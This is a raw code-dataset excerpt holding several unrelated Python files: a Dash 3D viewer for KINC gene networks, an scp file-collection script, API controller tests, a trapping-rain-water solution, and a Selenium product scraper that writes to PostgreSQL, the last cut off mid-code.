function.\n\n amx : The annotation matrix dataframe created by the load_amx function.\n\n nmeta : The dataframe containing the node metadata.\n\n vlayers : The dataframe containing the 3D coordinates for the nodes.\n\n elayers : The dataframe containing the 3D coordinates for the edges.\n\n sample_col : The name of the column in the amx that contains the sample\n name.\n\n net_name : The name of the network to display.\n\n\n return : The Dash application object.\n \"\"\"\n\n sidebar_box_style = {\n \"float\" : \"left\", \"width\" : \"100%\", \"color\" : \"black\",\n \"padding\" : \"0px\", \"margin-bottom\" : \"10px\",\n \"background-color\" : \"#CCCCCC\",\n \"border-radius\": \"5px\"\n }\n\n internal_js = write_to_data_uri(\"\"\"\n \"\"\")\n\n external_scripts = [\n 'https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js',\n internal_js,\n ]\n external_stylesheets = [\n ]\n app = dash.Dash(__name__,\n external_scripts=external_scripts,\n external_stylesheets=external_stylesheets\n )\n app.scripts.config.serve_locally = False\n app.layout = html.Div(\n style = {\n \"padding\" : \"0px\", \"background-color\" :\n \"black\", \"margin\" : \"0px\", \"color\" : \"white\",\n \"width\" : \"100%\", \"height\" : \"100vh\"\n },\n children = [\n # Graph Row\n html.Div(\n style = {\n \"border\" : \"0px solid white\", \"padding\" : \"15px\",\n \"background-color\" : \"black\", \"margin\" : \"0px\",\n },\n children=[\n dcc.Graph(\n id = 'network-3dview',\n style = {\n \"height\" : \"100vh\"\n },\n figure = create_network_plot(net, vlayers, elayers),\n config = {\n 'toImageButtonOptions' : {\n 'filename': 'kinc_3d_network_view',\n 'width': 800,\n 'height': 600,\n 'format': 'svg',\n 'scale' : 2\n }\n }\n ),\n dcc.Input(\n id='current-network-3dview-camera',\n type=\"number\",\n value=0,\n style= {'display' : 'none'}\n ),\n dcc.Input(\n id='current-network-3dview-aspect',\n type=\"number\",\n value=0,\n style= {'display' : 'none'}\n )\n ]\n ),\n # Header Row\n html.Div(\n id = \"header\",\n style={\n \"position\" : \"fixed\", \"left\" : \"30px\", \"top\" : \"20px\",\n 'padding' : '0px', \"margin\" : \"0px\",\n },\n children=[\n html.Img(\n src=\"https://raw.githubusercontent.com/SystemsGenetics/KINC/master/docs/images/kinc.png\",\n style={\n \"height\" : \"55px\",\"display\" : \"inline-block\",\n \"padding\" : \"0px\", 
\"margin\" : \"0px 10px 0px 10px\"}),\n html.H1(children=\"3D Network Explorer\",\n style={\n \"display\" : \"inline-block\", \"padding\" : \"10px 0px 0px 0px\",\n \"margin\" : \"0px\", \"vertical-align\" : \"top\"}),\n html.Div(children=\"Network name: \" + net_name,\n style={\"padding\" : \"0px 0px 0px 10px\"}),\n ]\n ),\n # Left Sidebar\n html.Div(\n style={\n \"position\" : \"fixed\", \"left\" : \"30px\", \"top\" : \"120px\",\n 'padding' : '0px 10px 0px 0px', \"margin\" : \"0px\",\n \"width\" : \"400px\", \"height\" : \"80vh\", 'overflow-y': 'auto',\n \"scrollbar-color\" : \"dark\"\n },\n children = [\n # Edge Color and Layer selection boxes.\n html.Div(\n id='edge-select-box',\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Layout and Colors\", 'edge-select-box'),\n html.Div(\n id='edge-select-box-contents',\n style={'margin' : '0px', 'display' : 'none', 'padding' : '10px'},\n children = [\n html.Label('Color Edges By'),\n create_edge_color_select(net),\n html.Label('Layer Edges By'),\n create_edge_layer_select(net)\n ]\n )\n ]\n ),\n # Node Details\n html.Div(\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Node Details\", 'node-table-box'),\n html.Div(\n id=\"node-table-box-contents\",\n style={'margin' : '0px', 'visibility' : 'hidden'},\n children=[create_dash_node_table(net, nmeta, vlayers)]\n ),\n ]\n ),\n # Edge Table\n html.Div(\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Edge Details\", 'edge-table-box'),\n html.Div(\n id=\"edge-table-box-contents\",\n style={'margin' : '0px', 'visibility' : 'hidden'},\n children=[create_dash_edge_table(net)]\n ),\n ]\n ),\n # 3D Co-Expression scatterplot row\n html.Div(\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Edge Scatterplot\", 'scatterplot-box'),\n html.Div(\n id='scatterplot-box-contents',\n style={'margin' : '0px', 'display' : 'none'},\n children = [\n html.Div(\n style={'padding-bottom' : '10px'},\n children=[\n html.Label('Color Samples By'),\n create_condition_select(amx, sample_col)\n ],\n ),\n dcc.Graph(\n id = 'edge-expression-3dview',\n figure = create_expression_scatterplot(gem, amx, elayers),\n config = {\n 'toImageButtonOptions' : {\n 'filename': 'kinc_3d_expression_scatterplot',\n 'width': 800,\n 'height': 600,\n 'format': 'svg',\n 'scale' : 1\n }\n },\n ),\n ]\n )\n ]\n ),\n # Sample Details\n html.Div(\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Sample Details\", 'sample-table-box'),\n html.Div(\n id=\"sample-table-box-contents\",\n style={'margin' : '0px', 'visibility' : 'hidden'},\n children=[create_dash_sample_table(net, amx)]\n ),\n ]\n ),\n # network stats\n html.Div(\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Network Stats\", 'network-stats-box'),\n html.Div(\n id='network-stats-box-contents',\n style={'margin' : '0px', 'padding' : '10px'},\n children = [\n create_network_stats_table(net),\n dcc.Graph(\n id = 'degree-distribution-plot',\n figure = create_degree_distribution_plot(vlayers),\n config = {\n 'toImageButtonOptions' : {\n 'filename': 'kinc_3d_degree_distribution',\n 'width': 800,\n 'height': 800,\n 'format': 'svg',\n 'scale' : 1\n }\n },\n ),\n dcc.Graph(\n id = 'avg-cc-distribution-plot',\n figure = create_avg_cc_distribution_plot(vlayers),\n config = {\n 'toImageButtonOptions' : {\n 'filename': 'kinc_3d_average_cc_distribution',\n 'width': 800,\n 'height': 600,\n 'format': 'svg',\n 'scale' : 1\n }\n },\n ),\n ]\n )\n ]\n ),\n ],\n ),\n dcc.Input(\n 
id='current-expr-camera-coords',\n type=\"number\",\n value=0,\n style= {'display' : 'none'}\n )\n ] # End app layout children\n ) # End app layout\n\n\n # Callback when an object in the network plot is clicked.\n @app.callback(\n [dash.dependencies.Output('edge-expression-3dview', 'figure'),\n dash.dependencies.Output('edge-table', 'children'),\n dash.dependencies.Output('node-table', 'children')],\n [dash.dependencies.Input('network-3dview', 'clickData'),\n dash.dependencies.Input('coexp-condition-select', 'value')],\n [dash.dependencies.State('edge-expression-3dview', 'figure')])\n def set_current_edge(clickData, color_col, figure):\n edge_index = None\n node = None\n if (clickData):\n scatterplot = figure\n node_table = None\n edge_table = None\n points = clickData['points']\n efound = re.match('^Edge: (.*?) \\(co\\) (.*?)$', points[0]['text'])\n nfound = re.match('^Node: (.*?)$', points[0]['text'])\n if (efound):\n edge_index = points[0]['customdata']\n row_vals = elayers.iloc[edge_index]\n source = row_vals['Source']\n target = row_vals['Target']\n edge_nodes = [source, target]\n scatterplot = create_expression_scatterplot(gem, amx, elayers, color_col, edge_index)\n edge_table = create_dash_edge_table(net, edge_index)\n node_table = create_dash_node_table(net, nmeta, vlayers, None)\n if (nfound):\n node = edge_index = points[0]['customdata']\n node_table = create_dash_node_table(net, nmeta, vlayers, node)\n edge_table = create_dash_edge_table(net, None)\n\n return [scatterplot, edge_table, node_table]\n\n\n raise dash.exceptions.PreventUpdate\n\n\n @app.callback(\n [dash.dependencies.Output('sample-table', 'children')],\n [dash.dependencies.Input('edge-expression-3dview', 'clickData')])\n def update_sample_table(clickData):\n if (clickData):\n sample = clickData['points'][0]['text']\n return [create_dash_sample_table(net, amx, sample)]\n raise dash.exceptions.PreventUpdate\n\n\n @app.callback(\n dash.dependencies.Output('current-network-3dview-camera', 'value'),\n [dash.dependencies.Input('network-3dview', 'relayoutData')])\n def set_current_camera(relayoutData):\n if (relayoutData):\n if 'scene.camera' in relayoutData.keys():\n camera = json.dumps(relayoutData[\"scene.camera\"])\n return camera\n raise dash.exceptions.PreventUpdate\n\n @app.callback(\n dash.dependencies.Output('current-network-3dview-aspect', 'value'),\n [dash.dependencies.Input('network-3dview', 'relayoutData')])\n def set_network_aspect(relayoutData):\n if (relayoutData):\n if 'scene.aspectratio' in relayoutData.keys():\n aspect = json.dumps(relayoutData[\"scene.aspectratio\"])\n return aspect\n raise dash.exceptions.PreventUpdate\n\n\n @app.callback(\n dash.dependencies.Output('network-3dview', 'figure'),\n [dash.dependencies.Input('edge-color-select', 'value'),\n dash.dependencies.Input('edge-layer-select', 'value')],\n [dash.dependencies.State('current-network-3dview-camera', 'value'),\n dash.dependencies.State('current-network-3dview-aspect', 'value')]\n )\n def update_network_plot(color_by, layer_by, camera_vals, aspect_vals):\n camera = None\n aspect = None\n if (type(camera_vals) == str):\n camera = json.loads(camera_vals)\n if (type(aspect_vals) == str):\n aspect = json.loads(aspect_vals)\n\n if not camera and not aspect:\n raise dash.exceptions.PreventUpdate\n\n return create_network_plot(net, vlayers, elayers, color_by, layer_by, camera, aspect)\n\n\n @app.callback(\n dash.dependencies.Output('edge-select-box-contents', 'style'),\n [dash.dependencies.Input('edge-select-box-toggle', 'n_clicks')]\n )\n def 
toggle_edge_select_box(toggle):\n if (toggle % 2 == 1):\n return {'margin' : '0px', 'visibility' : 'visible', 'padding' : '10px'}\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n\n @app.callback(\n dash.dependencies.Output('scatterplot-box-contents', 'style'),\n [dash.dependencies.Input('scatterplot-box-toggle', 'n_clicks')]\n )\n def toggle_scatterplot_box(toggle):\n if (toggle % 2 == 1):\n return {'margin' : '0px', 'visibility' : 'visible', 'max-height' : '500px', 'padding' : '10px'}\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n\n @app.callback(\n dash.dependencies.Output('sample-table-box-contents', 'style'),\n [dash.dependencies.Input('sample-table-box-toggle', 'n_clicks')]\n )\n def toggle_sample_table_box(toggle):\n if (toggle % 2 == 1):\n return {\n 'margin' : '0px', 'visibility' : 'visible',\n 'max-height' : '250px', 'padding' : '10px',\n 'overflow-y': 'auto',\n }\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n @app.callback(\n dash.dependencies.Output('network-stats-box-contents', 'style'),\n [dash.dependencies.Input('network-stats-box-toggle', 'n_clicks')]\n )\n def toggle_network_stats_box(toggle):\n if (toggle % 2 == 0):\n return {'margin' : '0px', 'visibility' : 'visible', 'padding' : '10px'}\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n @app.callback(\n dash.dependencies.Output('node-table-box-contents', 'style'),\n [dash.dependencies.Input('node-table-box-toggle', 'n_clicks')]\n )\n def toggle_node_table_box(toggle):\n if (toggle % 2 == 1):\n return {\n 'margin' : '0px', 'visibility' : 'visible',\n 'max-height' : '250px', 'padding' : '10px',\n 'overflow-y': 'auto',\n }\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n\n @app.callback(\n dash.dependencies.Output('edge-table-box-contents', 'style'),\n [dash.dependencies.Input('edge-table-box-toggle', 'n_clicks')]\n )\n def toggle_edge_table_box(toggle):\n if (toggle % 2 == 1):\n return {\n 'margin' : '0px', 'visibility' : 'visible',\n 'max-height' : '250px', 'padding' : '10px',\n 'overflow-y': 'auto',\n }\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n return app\n\n\ndef is_port_in_use(port):\n \"\"\"\n Checks if a port is already in use.\n\n port: the desired port to use\n \"\"\"\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n return s.connect_ex(('localhost', port)) == 0\n\n\ndef main():\n \"\"\"\n The main function.\n\n \"\"\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--net', dest='net_path', type=str, required=True, help=\"(required) The path to the KINC-derived network file\")\n parser.add_argument('--emx', dest='gem_path', type=str, required=True, help=\"(retuired) The path to the log2 transformed Gene Expression Matrix or Metabolite abundance matrix.\")\n parser.add_argument('--amx', dest='amx_path', type=str, required=True, help=\"(required) The path to the tab-delimited annotation matrix. The matrix must have at least one column that contains a unique list of sample names.\")\n parser.add_argument('--sample_col', dest='sample_col', type=str, required=False, default='Sample', help=\"(optional) The name of the column in the annotation matrix that contains the unique sample names. 
Defaults to 'Sample'\")\n    parser.add_argument('--nmeta', dest='nmeta', type=str, required=False, help=\"(optional) The path to a tab-delimited node meta data file. The format of the file must have 4 columns, with the first containing the node name, the second a controlled vocabulary term ID, the third the term definition and the fourth the vocabulary name.\")\n    parser.add_argument('--debug', dest='debug', action='store_true', default=False, help=\"(optional). Add this argument to enable Dash application debugging mode.\")\n    parser.add_argument('--redo-layout', dest='redo_layout', action='store_true', default=False, help=\"(optional). If the 2D and 3D network layout has already been constructed it will be loaded from a file. Add this argument to force the layouts to be rebuilt and not loaded from the files. To prevent Dash from rerunning the layout on callbacks, this option results in the program terminating. To view the application, restart without this option.\")\n    parser.add_argument('--iterations', dest='iterations', type=int, default=100, help=\"(optional). The number of iterations to perform when calculating the Force Atlas2 layout. This argument is only used the first time a network is viewed or if the --redo-layout argument is provided.\")\n    args = parser.parse_args()\n\n    # Make sure the paths exist\n    if not os.path.exists(args.net_path):\n        print (\"ERROR: The network file cannot be found: {}\".format(args.net_path))\n        exit(1)\n    if not os.path.exists(args.gem_path):\n        print (\"ERROR: The expression matrix file cannot be found: {}\".format(args.gem_path))\n        exit(1)\n    if not os.path.exists(args.amx_path):\n        print (\"ERROR: The annotation matrix file cannot be found: {}\".format(args.amx_path))\n        exit(1)\n    if args.nmeta is not None:\n        if not os.path.exists(args.nmeta):\n            print (\"ERROR: The node metadata file cannot be found: {}\".format(args.nmeta))\n            exit(1)\n\n    # Load the input data.\n    print(\"Reading network file...\")\n    net = load_network(args.net_path)\n    print(\"Reading GEM file...\")\n    gem = load_gem(args.gem_path)\n    print(\"Reading experiment annotation file...\")\n    amx = load_amx(args.amx_path, args.sample_col)\n\n    nmeta = None\n    if args.nmeta is not None:\n        print(\"Reading the node metadata file...\")\n        nmeta = load_node_meta(args.nmeta)\n\n\n    # Get the filename of the network file minus the extension.\n    (net_prefix, net_ext) = os.path.splitext(os.path.basename(args.net_path))\n\n    # Calculate a 2D layout for the network\n    glayout = calculate_2d_layout(net, net_prefix, args.redo_layout, args.iterations)\n\n    # Calculate the Z-coordinate positions for the vertices and edges.\n    bin_edges(net)\n    vlayers = get_vertex_zlayers(net, glayout, net_prefix, args.redo_layout)\n    elayers = get_edge_zlayers(net, glayout, net_prefix, args.redo_layout)\n\n\n    # If the user requested we rebuild the layout then terminate so Dash\n    # doesn't try to rebuild the layout on each callback.\n    if args.redo_layout:\n        print (\"Layouts have been built. 
Please relaunch without the --redo-layout option to view the app.\")\n exit(0)\n\n # Launch the dash application\n print(\"Launching application...\")\n app = build_application(net, gem, amx, nmeta, vlayers, elayers, args.sample_col, net_prefix)\n\n\n port = 8050\n while(is_port_in_use(port)):\n port = port + 1\n app.run_server(debug=args.debug, port=port)\n\n exit(0)\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bin/kinc-3d-viewer.py","file_name":"kinc-3d-viewer.py","file_ext":"py","file_size_in_byte":63581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"397446359","text":"import argparse\nimport logging\nimport subprocess\n\nfrom typing import Tuple\n\n\ndef solution(file: str, hosts_file: str, log: logging.Logger) -> None:\n try:\n with open(hosts_file, \"r\") as hostsfile:\n hosts = hostsfile.read().splitlines()\n except (IOError, FileNotFoundError) as exception:\n log.error(f\"Error reading from {hosts_file}: {exception}\")\n else:\n for host in hosts:\n try:\n user, server = host.split(\",\")[0], host.split(\",\")[1]\n subprocess.run([\"scp\", f\"{user}@{server}:{file}\", f\"./{user}_{server}_{file}\"])\n except OSError as exception:\n log.error(f\"Error copying file from {host}: {exception}\")\n continue\n\n\ndef setup_logging() -> logging.Logger:\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.ERROR)\n file_handle = logging.FileHandler(\"sol_14.log\")\n logger.addHandler(file_handle)\n return logger\n\n\ndef parse_args() -> Tuple[str, str]:\n parser = argparse.ArgumentParser(description=\"Get a file from a list of remote machines\")\n parser.add_argument(\"-file\", type=str, required=True,\n help=\"Path of file to fetch\")\n parser.add_argument(\"-hosts\", type=str, default=\"hosts.txt\",\n help=\"File containing list of hosts\")\n args = parser.parse_args()\n return args.file, args.hosts\n\n\ndef main():\n file, target_hosts = parse_args()\n log = setup_logging()\n solution(file, target_hosts, log)\n\n\nif __name__ == '__main__':\n main()","sub_path":"solutions/sol_14.py","file_name":"sol_14.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344413267","text":"import json\nfrom unittest import mock\n\nfrom playhouse import test_utils\n\nfrom api_framework.controllers import ListAPIController, RetrieveAPIController\n\nfrom .models import Invoice, Lineitem, proxy, Book\nfrom .schemas import InvoiceSchema, LineitemSchema, BookSchema\n\n\ndef test_fk(db):\n proxy.initialize(db)\n db.create_tables([Lineitem, Invoice])\n\n class LineitemController(ListAPIController):\n modelselect = Lineitem\n schema_class = LineitemSchema\n prefetch = (Invoice, )\n\n Lineitem.create(invoice=Invoice.create(number='1'), name='Foo', amount=432)\n Lineitem.create(invoice=Invoice.create(number='2'), name='Bar', amount=200)\n\n controller = LineitemController()\n\n req = mock.Mock()\n resp = mock.Mock()\n\n with test_utils.count_queries() as counter:\n controller.on_get(req, resp)\n results = json.loads(resp.body)\n assert len(results) == 2\n foo = next(r for r in results if r['name'] == 'Foo')\n assert foo\n assert foo['amount'] == 432\n assert foo['invoice']['number'] == '1'\n\n assert counter.count == 2\n\n\ndef test_list_fk(db):\n proxy.initialize(db)\n db.create_tables([Lineitem, Invoice])\n\n class InvoiceController(RetrieveAPIController):\n modelselect = Invoice\n schema_class = InvoiceSchema\n # prefetch = 
(Lineitem,)\n\n    invoice = Invoice.create(number='123')\n    Lineitem.create(invoice=invoice, name='Sproket', amount=1.23)\n    Lineitem.create(invoice=invoice, name='Gear', amount=2.00)\n    Lineitem.create(invoice=invoice, name='Shaft', amount=3.00)\n    Lineitem.create(invoice=invoice, name='Lever', amount=4.00)\n\n    req = mock.Mock()\n    resp = mock.Mock()\n\n    controller = InvoiceController()\n\n    with test_utils.count_queries() as counter:\n        controller.on_get(req, resp, id=invoice.id)\n        results = json.loads(resp.body)\n        assert results['number'] == '123'\n        assert isinstance(results['lineitems'], list)\n        lineitems = results['lineitems']\n        assert len(lineitems) == 4\n        assert lineitems[0]['name'] == 'Sproket'\n    assert counter.count == 2\n\n\ndef test_multi_field_lookup(db):\n    proxy.initialize(db)\n    db.create_tables([Book])\n\n    class BookController(RetrieveAPIController):\n        modelselect = Book\n        schema_class = BookSchema\n\n        def get_object(self, req, title, author):\n            return Book.select().where(Book.title==title, Book.author==author).get()\n\n    book = Book.create(title='Foo', author='Bar')\n\n    req = mock.Mock()\n    resp = mock.Mock()\n\n    controller = BookController()\n    controller.on_get(req, resp, title='Foo', author='Bar')\n    results = json.loads(resp.body)\n    assert results['title'] == 'Foo'\n    assert results['author'] == 'Bar'\n","sub_path":"tests/test_controllers.py","file_name":"test_controllers.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"406464566","text":"class Solution:\n    # def trap(self, height: List[int]) -> int:\n    def trap(self, height):\n        if len(height) < 3:\n            return 0\n        result = 0\n        stack = [0]\n        index = 1\n        while index < len(height):\n            h = height[index]\n            while len(stack) > 0 and h > height[stack[-1]]:\n                topIndex = stack.pop()\n                if len(stack) <= 0:\n                    break\n                minHeight = min(h, height[stack[-1]])\n                distance = index - stack[-1] - 1\n                volume = distance * (minHeight - height[topIndex])\n                result += volume\n            stack.append(index)\n            index += 1\n        return result\n\nsolution = Solution()\nheight = [0,1,0,2,1,0,1,3,2,1,2,1]\nprint(solution.trap(height))\n","sub_path":"Week_01/trap.py","file_name":"trap.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535907556","text":"# -*- coding: utf-8 -*-\n\nimport gevent.monkey\ngevent.monkey.patch_all()\nimport gevent\nfrom gevent.queue import Queue, Empty\nfrom gevent.lock import BoundedSemaphore\n\nimport os\nfrom dotenv import load_dotenv\n\nBASE_PATH = os.path.dirname(os.path.realpath(__file__))\nDOTENV_PATH = os.path.join(BASE_PATH, '.env')\nload_dotenv(DOTENV_PATH)\n\nimport logging\nimport unittest\nimport re\nimport psycopg2\nimport time\nfrom datetime import datetime\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import proxy\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import WebDriverException, NoSuchElementException, TimeoutException\nfrom selenium.webdriver.remote.remote_connection import RemoteConnection\n\n\nclass TestSite(unittest.TestCase):\n    def setUp(self):\n        # initialize logger\n        self.logger = logging.getLogger(__name__)\n        logger_path = os.getenv('PRODUCT_LOG_PATH', '')\n        logger_handler = 
logging.FileHandler(os.path.join(logger_path, '{}.log'.format(__name__)))\n        logger_formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n        logger_handler.setFormatter(logger_formatter)\n        self.logger.addHandler(logger_handler)\n        self.logger.setLevel(logging.INFO)\n        self.logger.propagate = False\n\n        self.worker_number = 1\n        self.worker_timeout = 30\n        self.queue_size = 10\n        self.tasks = Queue(maxsize=self.queue_size)\n        self.semaphore = BoundedSemaphore(1)\n\n        self.base_path = 'https://www.fc-moto.de/epages/fcm.sf/ru_RU/'\n\n        self.POSTGRES_DB = os.getenv('POSTGRES_DB', '')\n        self.POSTGRES_USER = os.getenv('POSTGRES_USER', '')\n        self.POSTGRES_PASSWORD = os.getenv('POSTGRES_PASSWORD', '')\n        self.POSTGRES_HOST = os.getenv('POSTGRES_HOST', '')\n        self.POSTGRES_PORT = os.getenv('POSTGRES_PORT', 5432)\n\n        self.SELENIUM_HUB_URL = os.getenv('SELENIUM_HUB_URL', '')\n        self.driver = None\n\n    def get_element_by_css_selector(self, driver, selector):\n        try:\n            element = driver.find_element_by_css_selector(selector)\n        except (NoSuchElementException, TimeoutException):\n            element = None\n        return element\n\n    def get_elements_by_css_selector(self, driver, selector):\n        try:\n            elements = driver.find_elements_by_css_selector(selector)\n        except (NoSuchElementException, TimeoutException):\n            elements = None\n        return elements\n\n    def get_product_by_link(self, page_url):\n        self.driver = None\n        product = None\n\n        try:\n            self.options = webdriver.ChromeOptions()\n            self.options.add_argument('--disable-logging')\n            self.options.add_argument('--disable-infobars')\n            self.options.add_argument('--disable-extensions')\n            self.options.add_argument('--disable-web-security')\n            self.options.add_argument('--no-sandbox')\n            self.options.add_argument('--headless')\n            self.options.add_argument('--window-size=600,480')\n            self.options.add_argument('--silent')\n            self.options.add_argument('--ignore-certificate-errors')\n            self.options.add_argument('--disable-popup-blocking')\n            self.options.add_argument('--incognito')\n            self.options.add_argument('--lang=ru')\n            self.options.add_experimental_option('prefs', {'intl.accept_languages': 'ru_RU'})\n\n            # self.capabilities = {\n            #     'browserName': 'chrome',\n            #     'chromeOptions': {\n            #         'useAutomationExtension': False,\n            #         'forceDevToolsScreenshot': True,\n            #         'directConnect': True,\n            #         'args': [\n            #             # '--start-maximized',\n            #             '--disable-infobars',\n            #             '--disable-extensions',\n            #             '--disable-web-security',\n            #             # '--disable-gpu',\n            #             # '--disable-dev-shm-usage',\n            #             '--no-sandbox',\n            #             '--headless',\n            #             '--window-size=600,480',\n            #             # '--remote-debugging-port=9222',\n            #             # '--crash-dumps-dir=/tmp',\n            #             '--silent',\n            #             '--ignore-certificate-errors',\n            #             '--disable-popup-blocking',\n            #             '--incognito',\n            #             '--lang=ru'\n            #         ],\n            #     },\n            #     'chrome.prefs': {\n            #         'intl.accept_languages': 'ru_RU'\n            #     }\n            # }\n\n\n            executor = RemoteConnection(self.SELENIUM_HUB_URL, resolve_ip=False)\n            self.driver = webdriver.Remote(command_executor=executor, desired_capabilities=self.options.to_capabilities())\n            self.driver.set_page_load_timeout(3*60)\n            self.driver.get(page_url)\n\n            initial_wait = WebDriverWait(self.driver, 3*60)\n            initial_wait.until(\n                EC.presence_of_element_located((By.CSS_SELECTOR, '.ContentAreaWrapper'))\n            )\n\n            # 'Name',\n            name = self.get_element_by_css_selector(self.driver, '.ICProductVariationArea [itemprop=\"name\"]')\n            name = name.text if name else ''\n\n            # 'Manufacturer',\n            manufacturer = self.get_element_by_css_selector(self.driver, '.ICProductVariationArea [itemprop=\"manufacturer\"]')\n            
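# the element lookups in this block may return None whenever a selector misses\n            # (see get_element_by_css_selector above), so every value is unwrapped with an\n            # 'x.text if x else ...' guard instead of assuming the element exists\n            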
manufacturer = manufacturer.text if manufacturer else ''\n\n            # 'Colors',\n            colors = self.get_element_by_css_selector(self.driver, '.ICVariationSelect .Headline.image .Bold.Value')\n            colors = colors.text if colors else ''\n\n            # 'All sizes',\n            all_size = self.get_elements_by_css_selector(self.driver, '.ICVariationSelect li > button')\n            all_size = set([size.text for size in all_size] if all_size else [])\n\n            # 'Inactive sizes',\n            disabled_size = self.get_elements_by_css_selector(self.driver, '.ICVariationSelect li.disabled > button')\n            disabled_size = set([size.text for size in disabled_size] if disabled_size else [])\n\n            # 'Active sizes',\n            active_size = all_size.difference(disabled_size)\n\n            # 'Price',\n            price = self.get_element_by_css_selector(self.driver, '.PriceArea .Price')\n            price = price.text if price else ''\n            price_cleaned = price.replace(' ', '').replace(',', '.')\n\n            # 'Photos'\n            front_picture = self.get_element_by_css_selector(self.driver, '#ICImageMediumLarge')\n            front_picture = front_picture.get_attribute('src') if front_picture else ''\n\n            activate_second_picture = self.get_element_by_css_selector(self.driver, '#ProductThumbBar > li:nth-child(2) > img')\n\n            if activate_second_picture:\n                activate_second_picture.click()\n                time.sleep(2)\n            back_picture = self.get_element_by_css_selector(self.driver, '#ICImageMediumLarge')\n            back_picture = back_picture.get_attribute('src') if activate_second_picture and back_picture else ''\n\n            # 'Description'\n            description = self.get_element_by_css_selector(self.driver, '.description[itemprop=\"description\"]')\n            description_text = description.text if description else ''\n            description_html = description.get_attribute('innerHTML') if description else ''\n\n            product = {\n                'name': name,\n                'manufacturer': manufacturer,\n                'colors': colors,\n                'all_size': all_size,\n                'disabled_size': disabled_size,\n                'active_size': active_size,\n                'price': price,\n                'price_cleaned': price_cleaned,\n                'front_picture': front_picture,\n                'back_picture': back_picture,\n                'description_text': description_text,\n                'description_html': description_html,\n\n            }\n            print(product)\n        except WebDriverException as e:\n            self.logger.exception('Error fetching {url}, error: {error}'.format(url=page_url, error=str(e)))\n            if self.driver:\n                self.driver.quit()\n            # self.get_product_by_link(page_url)\n        except KeyboardInterrupt:\n            if self.driver:\n                self.driver.quit()\n        except Exception as e:\n            self.logger.exception(str(e))\n        finally:\n            if self.driver:\n                self.driver.quit()\n        return product\n\n    def worker(self, n):\n        try:\n            while True:\n                url, category_id, pk = self.tasks.get(timeout=self.worker_timeout)\n                with psycopg2.connect(dbname=self.POSTGRES_DB, user=self.POSTGRES_USER, password=self.POSTGRES_PASSWORD, host=self.POSTGRES_HOST, port=self.POSTGRES_PORT) as connection:\n                    with connection.cursor() as cursor:\n                        sql_string = \"\"\"\n                            SELECT\n                                \"id\",\n                                \"url\"\n                            FROM \"product\"\n                            WHERE \"is_done\" = TRUE;\n                        \"\"\"\n                        cursor.execute(sql_string)\n\n                        if (pk, url,) not in cursor.fetchall():\n                            product = self.get_product_by_link(url)\n                            if product:\n                                sql_string = \"\"\"\n                                    INSERT INTO \"product\"\n                                    (\n                                        \"page_id\",\n                                        \"url\",\n                                        \"name_url\",\n                                        \"back_picture\",\n                                        \"colors\",\n                                        \"description_html\",\n                                        \"description_text\",\n                                        \"front_picture\",\n                                        \"manufacturer\",\n                                        \"name\",\n                                        \"price_cleaned\",\n                                        \"is_done\"\n                                    )\n                                    VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, TRUE)\n                                    ON CONFLICT (url, page_id) DO UPDATE\n                                    SET\n                                        \"updated_at\"=NOW(),\n                                        \"is_done\" = TRUE,\n                                        \"name_url\" = %s,\n                                        \"back_picture\" = 
%s,\n                                        \"colors\" = %s,\n                                        \"description_html\" = %s,\n                                        \"description_text\" = %s,\n                                        \"front_picture\" = %s,\n                                        \"manufacturer\" = %s,\n                                        \"name\" = %s,\n                                        \"price_cleaned\" = %s\n                                    RETURNING id;\n                                \"\"\"\n                                # plain scalar bindings (a trailing comma here would turn each value into a 1-tuple)\n                                page_id = pk\n                                name_url = url.split('/')[-1][:2044]\n                                url = url[:2044]\n                                back_picture = product['back_picture'][:2044]\n                                colors = product['colors'][:2044]\n                                description_html = product['description_html'][:5000]\n                                description_text = product['description_text'][:5000]\n                                front_picture = product['front_picture'][:2044]\n                                manufacturer = product['manufacturer'][:2044]\n                                name = product['name'][:2044]\n                                price_cleaned = product['price_cleaned'][:2044]\n\n                                parameters = (\n                                    page_id,\n                                    url,\n                                    name_url,\n                                    back_picture,\n                                    colors,\n                                    description_html,\n                                    description_text,\n                                    front_picture,\n                                    manufacturer,\n                                    name,\n                                    price_cleaned,\n                                    name_url,\n                                    back_picture,\n                                    colors,\n                                    description_html,\n                                    description_text,\n                                    front_picture,\n                                    manufacturer,\n                                    name,\n                                    price_cleaned,\n                                )\n                                cursor.execute(sql_string, parameters)\n                                product_id = 